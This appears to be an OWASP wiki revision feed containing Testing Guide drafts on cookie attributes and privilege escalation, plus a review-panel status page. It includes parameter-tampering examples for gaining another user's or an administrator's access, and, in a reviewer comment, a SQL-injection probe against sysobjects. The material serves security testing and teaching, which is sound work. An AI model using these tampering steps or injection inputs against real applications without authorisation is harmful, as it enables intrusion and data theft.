&lt;br /&gt;
Cookies are also set to maintain state across multiple requests.  Since HTTP is stateless, the server cannot determine whether a request it receives is part of a current session or the start of a new one without some type of identifier, and that identifier is very commonly (though not always) a cookie.  Many kinds of applications need to keep track of session state across multiple requests; the classic example is an online store, where the items a user adds to a shopping cart must be retained in subsequent requests to the application.  Cookies are very commonly used for this task: the application sets them using the Set-Cookie directive in its HTTP response, usually in a name=value format (provided cookies are enabled and supported, which is the case for all modern web browsers).  Once an application has told the browser to use a particular cookie, the browser sends that cookie in each subsequent request.  A cookie can contain data such as the items in an online shopping cart, their prices and quantities, personal information, user IDs, etc.  Due to the sensitive nature of the information in cookies, they are typically encoded or encrypted in an attempt to protect it.&lt;br /&gt;
Multiple cookies (separated by a semicolon) will often be set on subsequent requests, especially in an online store as you add items to your shopping cart.  In that type of application you will typically have one cookie for authentication (the session token described above) once you log in, and several other cookies identifying the items you wish to purchase and their auxiliary information (i.e. price, quantity, etc.).&lt;br /&gt;
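As an illustration of the name=value mechanics described above, the following sketch uses Python's standard http.cookies module; the cookie names and values are made up for the example and not taken from any real application.

```python
from http.cookies import SimpleCookie

# Build the kind of name=value cookies an online store might set
# (CARTID and ITEMS are invented names for illustration).
cart = SimpleCookie()
cart["CARTID"] = "8f3b2c"
cart["ITEMS"] = "3"

# What the server emits in its HTTP response (one Set-Cookie per cookie):
for morsel in cart.values():
    print("Set-Cookie: " + morsel.OutputString())

# What the browser sends back on each subsequent request,
# multiple cookies separated by a semicolon:
print("Cookie: " + "; ".join(m.OutputString() for m in cart.values()))
```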
&lt;br /&gt;
Now that you understand how cookies are set, when they are set, what they are used for, and why they are important, let's look at which attributes can be set for a cookie and how to test whether they are secure.  The following is a list of the attributes that can be set for each cookie and what they mean.  The next section will focus on how to test for each attribute.&lt;br /&gt;
&lt;br /&gt;
*secure - This attribute tells the browser to send the cookie only if the request is being sent over a secure channel such as HTTPS.  This helps protect the cookie from being passed in unencrypted requests.&lt;br /&gt;
If the application can be accessed over both HTTP and HTTPS, there is the potential for the cookie to be sent in clear text.&lt;br /&gt;
&lt;br /&gt;
*HttpOnly - This attribute helps mitigate attacks such as cross-site scripting, since it does not allow the cookie to be accessed by a client-side script such as JavaScript.  Note that not all browsers support this functionality.&lt;br /&gt;
&lt;br /&gt;
*domain - This attribute is compared against the domain of the server to which the request is being sent.  If the domain matches, or if the server is a sub-domain of it, the path attribute is checked next.&lt;br /&gt;
Note that only hosts within the specified domain can set a cookie for that domain.  Also, the domain attribute cannot be a top-level domain (such as .gov or .com), to prevent servers from setting arbitrary cookies for another domain.  If the domain attribute is not set, its default value is the hostname of the server which generated the cookie.&lt;br /&gt;
For example, if a cookie is set by an application at app.mydomain.com with no domain attribute, the cookie will be resubmitted on all subsequent requests to app.mydomain.com and its subdomains (such as hacker.app.mydomain.com), but not to otherapp.mydomain.com.  If a developer wanted to loosen this restriction, he could set the domain attribute to mydomain.com; in that case the cookie would be sent on all requests to app.mydomain.com, to its subdomains such as hacker.app.mydomain.com, and even to bank.mydomain.com.&lt;br /&gt;
If there is a vulnerable server on a subdomain (such as otherapp.mydomain.com) and the domain attribute has been set too loosely (for example, to mydomain.com), then the vulnerable server can be used to harvest cookies (such as session tokens).&lt;br /&gt;
 &lt;br /&gt;
*path - In addition to the domain, the URL path for which the cookie is valid can be specified.  If both the domain and the path match, the cookie is sent in the request.&lt;br /&gt;
Just as with the domain attribute, if the path attribute is set too loosely the application can be left vulnerable to attack by other applications on the same server.  For example, if the path attribute were set to the web server root &amp;quot;/&amp;quot;, the application's cookies would be sent to every application within the same domain. &lt;br /&gt;
&lt;br /&gt;
*expires - This attribute is used to set persistent cookies: the cookie does not expire until the set date is exceeded, and it will be used by the current browser session and subsequent sessions until then.  Once the expiration date has passed, the browser deletes the cookie.  If this attribute is not set, the cookie is valid only in the current browser session and is deleted when the session ends.&lt;br /&gt;
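The domain-matching rule described above can be sketched as a small function. This is a hypothetical helper written to mirror the behaviour described in this section, not the implementation of any particular browser:

```python
def domain_matches(request_host, cookie_domain):
    """Would a cookie with this domain attribute be sent to request_host?
    Mirrors the matching rule described in the text above."""
    cookie_domain = cookie_domain.lstrip(".").lower()
    request_host = request_host.lower()
    return (request_host == cookie_domain
            or request_host.endswith("." + cookie_domain))

# Loosened to mydomain.com, the cookie reaches every subdomain:
print(domain_matches("bank.mydomain.com", "mydomain.com"))          # True
# Defaulted to the originating host, it does not reach sibling hosts:
print(domain_matches("otherapp.mydomain.com", "app.mydomain.com"))  # False
```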
 &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Testing for cookie attribute vulnerabilities:''' &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Using an intercepting proxy or browser plug-in, trap all responses in which the application sets a cookie (using the Set-Cookie directive) and inspect the cookie for the following:&lt;br /&gt;
&lt;br /&gt;
*Secure Attribute - Whenever a cookie contains sensitive information or is a session token, it should always be passed over an encrypted tunnel.  For example, after logging into an application, if a session token is set via a cookie, verify that it is tagged with the &amp;quot;;secure&amp;quot; flag.  If it is not, the browser will consider it safe to pass over an unencrypted channel such as HTTP.&lt;br /&gt;
&lt;br /&gt;
*HttpOnly Attribute - This attribute should always be set, even though not every browser supports it.  It aids in securing the cookie from access by client-side scripts, so check whether the &amp;quot;;HttpOnly&amp;quot; tag has been set.&lt;br /&gt;
&lt;br /&gt;
*Domain Attribute - Verify that the domain has not been set too loosely.  As noted above, it should be set only for the server that needs to receive the cookie.  For example, if the application resides on server app.mysite.com, it should be set to &amp;quot;; domain=app.mysite.com&amp;quot; and NOT &amp;quot;; domain=.mysite.com&amp;quot;, as the latter would allow other, potentially vulnerable, servers to receive the cookie. &lt;br /&gt;
&lt;br /&gt;
*Path Attribute - Verify that the path attribute, just like the domain attribute, has not been set too loosely.  Even if the domain attribute has been configured as tightly as possible, if the path is set to the root directory &amp;quot;/&amp;quot; the cookie can be exposed to less secure applications on the same server.  For example, if the application resides at /myapp/, verify that the cookie's path is set to &amp;quot;; path=/myapp/&amp;quot; and NOT &amp;quot;; path=/&amp;quot; or &amp;quot;; path=/myapp&amp;quot;.  Notice that the trailing &amp;quot;/&amp;quot; after myapp must be used; without it, the browser will send the cookie to any path that matches &amp;quot;myapp&amp;quot;, such as &amp;quot;myapp-exploited&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
*Expires Attribute - If this attribute is set to a time in the future, verify that the cookie does not contain any sensitive information.  For example, if a cookie is set to &amp;quot;; expires=Fri, 13-Jun-2010 13:45:29 GMT&amp;quot; and the current date is June 10th, 2008, you will want to inspect the cookie.  If the cookie is a session token stored on the user's hard drive, an attacker or local user (such as an admin) with access to it can access the application by resubmitting the token until the expiration date passes.&lt;br /&gt;
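Once the responses have been captured with the proxy, the checks above can be partially automated. The following sketch is a hypothetical helper (the app.mysite.com host and /myapp/ path defaults are assumptions for the example); it parses a captured Set-Cookie header value with Python's standard http.cookies module and flags the weaknesses discussed:

```python
from http.cookies import SimpleCookie

def find_cookie_issues(set_cookie_header, app_path="/myapp/",
                       app_host="app.mysite.com"):
    """Flag weaknesses in a captured Set-Cookie header value, applying the
    Secure/HttpOnly/Domain/Path/Expires checks described above."""
    issues = []
    cookie = SimpleCookie()
    cookie.load(set_cookie_header)
    for name, morsel in cookie.items():
        if not morsel["secure"]:
            issues.append(f"{name}: missing Secure flag (may travel over HTTP)")
        if not morsel["httponly"]:
            issues.append(f"{name}: missing HttpOnly flag (readable by scripts)")
        domain = morsel["domain"]
        # Simplified suffix check: a broader domain than the host is suspicious.
        if (domain and app_host.endswith(domain.lstrip("."))
                and domain.lstrip(".") != app_host):
            issues.append(f"{name}: domain '{domain}' is looser than the host")
        if morsel["path"] != app_path:
            issues.append(f"{name}: path '{morsel['path']}' does not match "
                          f"'{app_path}' exactly")
        if morsel["expires"]:
            issues.append(f"{name}: persistent cookie "
                          f"(expires={morsel['expires']})")
    return issues

for issue in find_cookie_issues("SID=abc; path=/; domain=.mysite.com"):
    print(issue)
```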
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*RFC 2965 - HTTP State Management Mechanism&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*Intercepting Proxy (for example OWASP's Webscarab, Burp proxy, or Paros Proxy)&lt;br /&gt;
*Browser Plug-in (for example TamperIE for Internet Explorer or Tamper Data for Firefox)&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Privilege_escalation_(OTG-AUTHZ-003)&amp;diff=33577</id>
		<title>Testing for Privilege escalation (OTG-AUTHZ-003)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Privilege_escalation_(OTG-AUTHZ-003)&amp;diff=33577"/>
				<updated>2008-07-07T10:00:33Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: Added definition of vertical, horizontal escalation. Corrected syntax where it was possible without major restructuring (however, further work is required).&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
'''This is a draft of a section of the new Testing Guide v3'''&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
This section describes the issue of escalating privileges from one level to another. During this phase, the tester should verify that it is not possible for a user to modify his privileges or roles inside the application in a way that allows privilege escalation.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Privilege escalation occurs when a user gains access to more resources than he is normally allowed, even though those resources should have been protected by the application. This is usually caused by a flaw in the application. The result is that the application performs actions with more privileges than intended by the application developer or system administrator.&lt;br /&gt;
&lt;br /&gt;
The degree of the escalation depends on which privileges the attacker is authorized to possess and which privileges can be obtained in a successful attack. For example, a programming error that permits a user to gain extra privilege after successful authentication limits the degree of escalation because the user is already authorized to hold some privilege. Likewise, a remote attacker gaining superuser privilege without any authentication presents a greater degree of escalation.&lt;br /&gt;
&lt;br /&gt;
Usually we refer to ''vertical escalation'' when it is possible to access resources granted to more privileged accounts (e.g., acquiring administrative privileges for the application), and to ''horizontal escalation'' when it is possible to access resources granted to a similarly configured account (e.g., in an online banking application, accessing information related to a different user).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Testing for role/privilege manipulation''' &amp;lt;br&amp;gt;&lt;br /&gt;
At every point of the application where a user can create information in the database (make a payment, add a contact, send a message), receive information (statement of account, order details, etc.), or delete information (drop users, messages, etc.), the tester should record that functionality. The tester should then try to access it as another user, to verify, for example, whether it is possible to reach functionality that should not be permitted by the user's role.&lt;br /&gt;
&lt;br /&gt;
For example:&amp;lt;br&amp;gt;&lt;br /&gt;
The following HTTP POST allows a user belonging to grp001 to access order #0001:&lt;br /&gt;
&lt;br /&gt;
 POST /path/viewMyOrder.jsp HTTP/1.1&lt;br /&gt;
 Host: www.example.com&lt;br /&gt;
 [others HTTP Headers]&lt;br /&gt;
&lt;br /&gt;
 gruppoID=grp001&amp;amp;ordineID=0001&lt;br /&gt;
&lt;br /&gt;
Verify whether a user who does not belong to grp001 can modify the values of the parameters &amp;quot;gruppoID&amp;quot; and &amp;quot;ordineID&amp;quot; to gain access to that reserved data.&lt;br /&gt;
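One way to exercise this test is to rebuild the request with attacker-chosen parameter values and replay it from a session belonging to a different group. The sketch below only constructs the request; the URL and the grp002 value are invented for the example, and actually sending it would be done through the tester's proxy or urllib:

```python
from urllib.parse import urlencode
from urllib.request import Request

def build_tampered_request(group_id, order_id):
    """Rebuild the POST above with tester-chosen parameter values.
    The host and parameter names come from the example request."""
    body = urlencode({"gruppoID": group_id, "ordineID": order_id}).encode()
    return Request("http://www.example.com/path/viewMyOrder.jsp",
                   data=body, method="POST")

# Replay as a user outside grp001, asking for another group's order:
req = build_tampered_request("grp002", "0001")
print(req.data)  # b'gruppoID=grp002&ordineID=0001'
```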
&lt;br /&gt;
For example:&amp;lt;br&amp;gt;&lt;br /&gt;
The following server response shows a hidden field in the HTML returned to the user after a successful authentication.&lt;br /&gt;
&lt;br /&gt;
 HTTP/1.1 200 OK&lt;br /&gt;
 Server: Netscape-Enterprise/6.0&lt;br /&gt;
 Date: Wed, 1 Apr 2006 13:51:20 GMT&lt;br /&gt;
 Set-Cookie: USER=aW78ryrGrTWs4MnOd32Fs51yDqp; path=/; domain=www.example.com &lt;br /&gt;
 Set-Cookie: SESSION=k+KmKeHXTgDi1J5fT7Zz; path=/; domain=www.example.com&lt;br /&gt;
 Cache-Control: no-cache&lt;br /&gt;
 Pragma: No-cache &lt;br /&gt;
 Content-length: 247&lt;br /&gt;
 Content-Type: text/html&lt;br /&gt;
 Expires: Thu, 01 Jan 1970 00:00:00 GMT&lt;br /&gt;
 Connection: close&lt;br /&gt;
 &amp;lt;form name=&amp;quot;autoriz&amp;quot; method=&amp;quot;POST&amp;quot; action=&amp;quot;visual.jsp&amp;quot;&amp;gt; &lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;profilo&amp;quot; value=&amp;quot;SistemiInf1&amp;quot;&amp;gt;                                         &lt;br /&gt;
 &amp;lt;body onload=&amp;quot;document.forms.autoriz.submit()&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;/td&amp;gt;&lt;br /&gt;
 &amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
What if the tester modifies the value of the variable &amp;quot;profilo&amp;quot; to &amp;quot;SistemiInf9&amp;quot;? &lt;br /&gt;
Is it possible to become an administrator?&lt;br /&gt;
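Hidden fields like this one can be enumerated automatically before tampering with them. A minimal sketch using Python's standard html.parser, fed with the form snippet from the response above:

```python
from html.parser import HTMLParser

class HiddenFieldFinder(HTMLParser):
    """Collect hidden form fields, which are candidates for tampering."""
    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden":
            self.fields[a.get("name")] = a.get("value")

finder = HiddenFieldFinder()
finder.feed('<form name="autoriz" method="POST" action="visual.jsp">'
            '<input type="hidden" name="profilo" value="SistemiInf1">')
print(finder.fields)  # {'profilo': 'SistemiInf1'}

# The tester would resubmit the form with a different profile value:
finder.fields["profilo"] = "SistemiInf9"
```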
&lt;br /&gt;
For example:&amp;lt;br&amp;gt;&lt;br /&gt;
Consider an environment in which the server sends an error message as the value of a specific parameter within a set of response codes, such as the following:&lt;br /&gt;
&lt;br /&gt;
 @0`1`3`3``0`UC`1`Status`OK`SEC`5`1`0`ResultSet`0`PVValido`-1`0`0` Notifications`0`0`3`Command  Manager`0`0`0` StateToolsBar`0`0`0`    &lt;br /&gt;
 StateExecToolBar`0`0`0`FlagsToolBar`0&lt;br /&gt;
&lt;br /&gt;
The server places implicit trust in the user: it assumes that the user will answer with the above message, closing the session.&lt;br /&gt;
In this condition, verify that it is not possible to escalate privileges by modifying the parameter values.&lt;br /&gt;
For example, by modifying the `PVValido` value from '-1' to '0' (no error condition), it may be possible to authenticate to the server as an administrator.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
The tester should verify whether a privilege escalation attempt succeeds&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* OWASP WebScarab&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Review_Panel&amp;diff=13152</id>
		<title>OWASP Testing Guide v2 Review Panel</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Review_Panel&amp;diff=13152"/>
				<updated>2006-11-16T17:02:54Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents Table of Contents]]&lt;br /&gt;
&lt;br /&gt;
Update: 15th November, 16.00 (GMT+1)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
**********************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;Reviewing planning&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
**********************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The reviewers are:&lt;br /&gt;
Mark Roxberry,&lt;br /&gt;
Alberto Revelli,&lt;br /&gt;
Daniel Cuthbert,&lt;br /&gt;
Antonio Parata,&lt;br /&gt;
Matteo G.P. Flora,&lt;br /&gt;
Matteo Meucci,&lt;br /&gt;
Eoin Keary,&lt;br /&gt;
Stefano Di Paola,&lt;br /&gt;
James Kist,&lt;br /&gt;
Vicente Aguilera,&lt;br /&gt;
Mauro Bregolin,&lt;br /&gt;
Syed Mohamed A&lt;br /&gt;
&lt;br /&gt;
We can begin the 1st reviewing phase by reviewing all 63 articles (nearly 13 articles per person). The deadline is 15th November at 20.00 (GMT+1), because 15th November is the 1st deadline for the Autumn of Code Project.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;We are waiting for the following articles &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4.2.2 Spidering and googling (40%, Tom Brennan, Tom Ryan) &amp;lt;br&amp;gt;&lt;br /&gt;
4.2.4.2 DB Listener Testing TD (Maybe Eoin?)&amp;lt;br&amp;gt;&lt;br /&gt;
4.5.5 HTTP Exploit (0%, Arian J.Evans)&amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2.2 Oracle testing TD &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.4 ORM Injection (0%, Mark Roxberry)&amp;lt;br&amp;gt;&lt;br /&gt;
5. Writing Reports: value the real risk&amp;lt;br&amp;gt;&lt;br /&gt;
5.1 How to value the real risk (50%, Daniel Cuthbert, Matteo Meucci, Sebastien Deleersnyder, Marco Morana)&amp;lt;br&amp;gt;&lt;br /&gt;
5.2 How to write the report of the testing (0%, Daniel Cuthbert, Tom Brennan, Tom Ryan) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;Here is the complete list of articles to be reviewed: &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Introduction --&amp;gt; reviewed by Eoin Keary'''&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''The OWASP Testing Framework --&amp;gt;...'''&lt;br /&gt;
1 of 1 article to be reviewed &lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.1 Introduction and objectives --&amp;gt;.EK'''&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.2 Information Gathering (Reviewed by EK) --&amp;gt; Keary'''&lt;br /&gt;
9 of 10 articles reviewed -&amp;gt; &amp;lt;BR&amp;gt; &lt;br /&gt;
* '''Application Discovery''': &lt;br /&gt;
** Reviewed + updated(EK) (Maybe we should include HTTP methods for application discovery, such as the HTTP HEAD command?)&amp;lt;BR&amp;gt;&lt;br /&gt;
** (Bregolin) If you are referring to things such as &amp;quot;fingerprinting&amp;quot;, it was hinted - and I personally agree on this - to create a new section on Web application fingerprinting. There's however a bit of overlap with Infrastructure configuration management testing&lt;br /&gt;
* '''Analysis of error codes''': &lt;br /&gt;
** Reviewed + updated(EK) &amp;lt;BR&amp;gt;&lt;br /&gt;
** Besides the error itself, would it be necessary to discuss the deliberate provocation of errors? (Vicente). Two examples: &amp;lt;BR&amp;gt;&lt;br /&gt;
*** Example 1: Type error. (original): ?id=276 (test): ?id=X &amp;lt;BR&amp;gt;&lt;br /&gt;
*** Example 2: Type conversion error. (original): ?id=276 (test): ?id=276 and 1 in (select top 1 name from sysobjects) &amp;lt;BR&amp;gt;&lt;br /&gt;
** (Bregolin) Agree with the above. A testing methodology should be formalized, i.e. tester should verify if it is possible to cause information disclosure in error or diagnostic messages by tampering with user-alterable input using a set of techniques (such as type mismatch, overflow/underflow, excess input length, various forms of injection, ...)&lt;br /&gt;
* '''Infrastructure configuration management testing AoC''': &lt;br /&gt;
** Reviewed by EK. '''Not in typical guide structure'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* '''SSL/TLS Testing AoC''': &lt;br /&gt;
** Reviewed + updated(EK) &amp;lt;BR&amp;gt;&lt;br /&gt;
* '''DB Listener Testing''': &lt;br /&gt;
** '''Incomplete'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* '''Application configuration management testing''': &lt;br /&gt;
** Reviewed by EK. '''Not typical guide structure'''&lt;br /&gt;
** This is generally a &amp;quot;white box&amp;quot; section. There are no examples of testing the configuration from a remote perspective. If this was the aim of the document, that's fine. '''- Need feedback on this one!!'''&lt;br /&gt;
** ''Sample/known files and directories'': might be good to refer to http://www.owasp.org/index.php/Old_file_testing_AoC ??&lt;br /&gt;
** ''Logging'': Timestamp is also important&lt;br /&gt;
* '''File extensions handling'''&amp;lt;BR&amp;gt;&lt;br /&gt;
** contains the text: &amp;quot;''...To review and expand...''&amp;quot; - '''Is this complete??'''&lt;br /&gt;
** '''Need a second opinion on this one'''!! :)&lt;br /&gt;
* '''Old file testing''': Reviewed by EK&lt;br /&gt;
&amp;lt;BR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.3 Business logic testing --&amp;gt; Meucci'''&lt;br /&gt;
1 of 1 article reviewed &lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.4 Authentication Testing --&amp;gt; Roxberry (articles have been edited)'''&lt;br /&gt;
0 of 7 articles to be reviewed &lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.4 Authentication Testing (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Authentication-Testing-Index-Page.aspx Authentication Testing Index]&lt;br /&gt;
** 4.4.1 Default or guessable (dictionary) user account (80%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Default-or-Guessable-User-Account-Testing-AoC.aspx Default or guessable user account review]&lt;br /&gt;
** 4.4.2 Brute Force (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Brute-Force-Testing-AoC.aspx Brute Force review]&lt;br /&gt;
** 4.4.3 Bypassing authentication schema (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Bypassing-Authentication-Schema-AoC.aspx Bypass Authentication review]&lt;br /&gt;
** 4.4.4 Directory traversal/file include (100%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Directory-Traversal-Testing-AOC.aspx Directory Traversal Testing review]&lt;br /&gt;
** 4.4.5 Vulnerable remember password and pwd reset (90%) Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Vulnerable-Remember-Password-and-Pwd-Reset-AoC.aspx Vulnerable Reset Password review]&lt;br /&gt;
** 4.4.6 Logout and Browser Cache Management Testing (100%) Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Logout-and-Browser-Cache-Management-Testing-AoC.aspx Logout and Browser Cache Management Testing review]&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.5 Session Management Testing --&amp;gt; Syed Mohamed A'''&lt;br /&gt;
5 of 6 articles to be reviewed  &lt;br /&gt;
** 4.5 Session Management Testing (95%)&lt;br /&gt;
** 4.5.1 Analysis of the Session Management Schema (90%)&lt;br /&gt;
** 4.5.2 Cookie and Session token Manipulation (100%)&lt;br /&gt;
** 4.5.3 Exposed session variables (90%)&lt;br /&gt;
** 4.5.4 Session Riding (XSRF) (80%)&lt;br /&gt;
** 4.5.5 HTTP Exploit (0%)&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.6 Data Validation Testing --&amp;gt; Meucci'''&lt;br /&gt;
18 articles reviewed (3 are at 0%)&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.6 Data Validation Testing : Reviewed by EK&lt;br /&gt;
*** (Bregolin) begin&lt;br /&gt;
*** [Note: Haven't committed the following since that would imply a substantial rewrite, let's see what others think]&lt;br /&gt;
*** I think that this section should first categorize what constitutes input for a web application (which allows one to identify what must be tested, and how): obviously input fields, hidden fields, HTTP headers (such as Referer, cookies), HTTP methods, etc.&lt;br /&gt;
*** There are other kinds of injection, such as CRLF injection.&lt;br /&gt;
*** SQL Injection affects SQL statements, and not queries (though usually that's the case)&lt;br /&gt;
*** It should be stressed that the main reason to perform data validation is to prevent application faults, i.e. unexpected behavior, that is violation of (security) requirements. Regardless of the categories of vulnerabilities listed, an application should (actually must!) verify all input against: type, length, range or domain validity. &amp;quot;Bad&amp;quot; input may not cause any of the listed vulnerabilities yet cause the application to misbehave, if it is not checked (possibly causing DoS or violating data integrity or confidentiality).&lt;br /&gt;
*** (Bregolin) end&lt;br /&gt;
** 4.6.1 Cross site scripting: Reviewed by EK (Reformatted it slightly with wiki tags). '''Not completed'''&lt;br /&gt;
** 4.6.1.1 HTTP Methods and XST Reviewed by MM. Reviewed by AP.&lt;br /&gt;
** 4.6.2 SQL Injection (90%) Reviewed by MM. Reviewed by EK.&lt;br /&gt;
*** Not sure about &amp;quot;inferential&amp;quot; injection definition in &amp;quot;Description of Issue&amp;quot;&lt;br /&gt;
*** Added some reference to Oracle. Corrected English.&lt;br /&gt;
** 4.6.2.1 Stored procedure injection (40%) '''TD (not enough information)'''&lt;br /&gt;
**4.6.2.2 Oracle testing (0%) '''TD (not enough information)'''&lt;br /&gt;
** 4.6.2.3 MySQL testing (100%) Reviewed by MM&lt;br /&gt;
** 4.6.2.4 SQL Server testing (95%) Reviewed by MM. '''tools?'''&lt;br /&gt;
** 4.6.3 LDAP Injection (90%) Reviewed by MM added wp and tools&lt;br /&gt;
** 4.6.4 ORM Injection (0%) '''TD (not enough information)'''&lt;br /&gt;
** 4.6.5 XML Injection (90%) Reviewed and updated by MM. '''WP and tools?'''&lt;br /&gt;
** 4.6.6 SSI Injection (95%) Reviewed by MM &lt;br /&gt;
** 4.6.7 XPath Injection (80%) Reviewed by MM. '''Gray box section is to complete?'''&lt;br /&gt;
** 4.6.8 IMAP/SMTP Injection (95%)Reviewed by MM &lt;br /&gt;
** 4.6.9 Code Injection (70%) Reviewed by MM. '''Not completed'''&lt;br /&gt;
** 4.6.10 OS Commanding (70%) Reviewed by MM. '''Not completed'''&lt;br /&gt;
** 4.6.11 Buffer overflow Testing (100%) Reviewed by MM. '''Note: these tests are not usual web app tests'''&lt;br /&gt;
*** (Bregolin) The point is that these are not black box tests, so where they are now they are misplaced&lt;br /&gt;
** 4.6.11.1 Heap overflow (100%) Reviewed by MM&lt;br /&gt;
** 4.6.11.2 Stack overflow (100%)Reviewed by MM&lt;br /&gt;
** 4.6.11.3 Format string (100%)Reviewed by MM&lt;br /&gt;
** 4.6.12 Incubated vulnerability testing (95%) Reviewed by MM, whitepapers?&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''4.7 Denial of Service Testing--&amp;gt; Revelli'''&lt;br /&gt;
8 of 8 articles Reviewed&lt;br /&gt;
'''[OK] - To do the References'''&lt;br /&gt;
** 4.7 Denial of Service Testing 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.1 Locking Customer Accounts 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.2 Buffer Overflows 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.3 User Specified Object Allocation 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.4 User Input as a Loop Counter 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.5 Writing User Provided Data to Disk 100% Reviewed by Revelli&lt;br /&gt;
